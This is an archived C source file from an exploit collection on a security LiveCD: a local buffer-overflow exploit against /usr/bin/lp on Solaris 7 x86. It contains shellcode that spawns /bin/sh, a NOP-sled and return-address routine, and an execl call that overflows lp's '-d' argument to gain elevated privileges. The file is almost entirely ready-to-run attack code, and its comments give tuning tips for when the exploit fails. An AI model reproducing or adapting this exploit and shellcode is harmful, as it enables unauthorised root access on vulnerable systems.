home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / lp-solaris7-of-x86.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  1KB  |  50 lines

---

1. /*      
2.  *      
3.  * solaris 2.7 /usr/bin/lp local exploit, i386.
4.  *
5.  * discovered by DiGiT.
6.  * try offset 150-250 if sploit fails
7.  *
8.  * greets: #!ADM, #!security.is, #hax, duke
9.  *
10.  * DiGiT - teddi@linux.is 
11.  *
12.  */
13.  
14. #include <stdio.h>
15. #include <stdlib.h> 
16.  
17.  
18. char shellcode[] =
19.  "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
20.  "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
21.  "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
22.  "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
23.  "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
24.  "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";
25.   
26. #define BUFSIZE  1100  
27.  
28. long get_esp() { __asm__("movl %esp,%eax"); }
29.  
30. int main(int argc, char *argv[]) {
31.  
32.   char buff[BUFSIZE];
33.   int nopcount=501, offset=260;
34.   int i;
35.  
36.   if (argc > 1) offset = atoi(argv[1]);
37.   if (argc > 2) nopcount  = atoi(argv[2]);
38.  
39.         memset (buff, 0x90, BUFSIZE);
40.  
41.                 for (i = nopcount; i < BUFSIZE - 4; i += 4)
42.                 *(long *) &buff[i] = get_esp() + offset;
43.         memcpy (buff + (nopcount - strlen (shellcode)), shellcode, strlen
44.         (shellcode));
45.  
46.             memcpy (buff, ":", 1);
47.             printf("Addr = 0x%x\n", get_esp() + offset);
48.          execl("/usr/bin/lp", "lp", "-d", buff, "-p", "/tmp/ps_data",NULL);
49. }
50.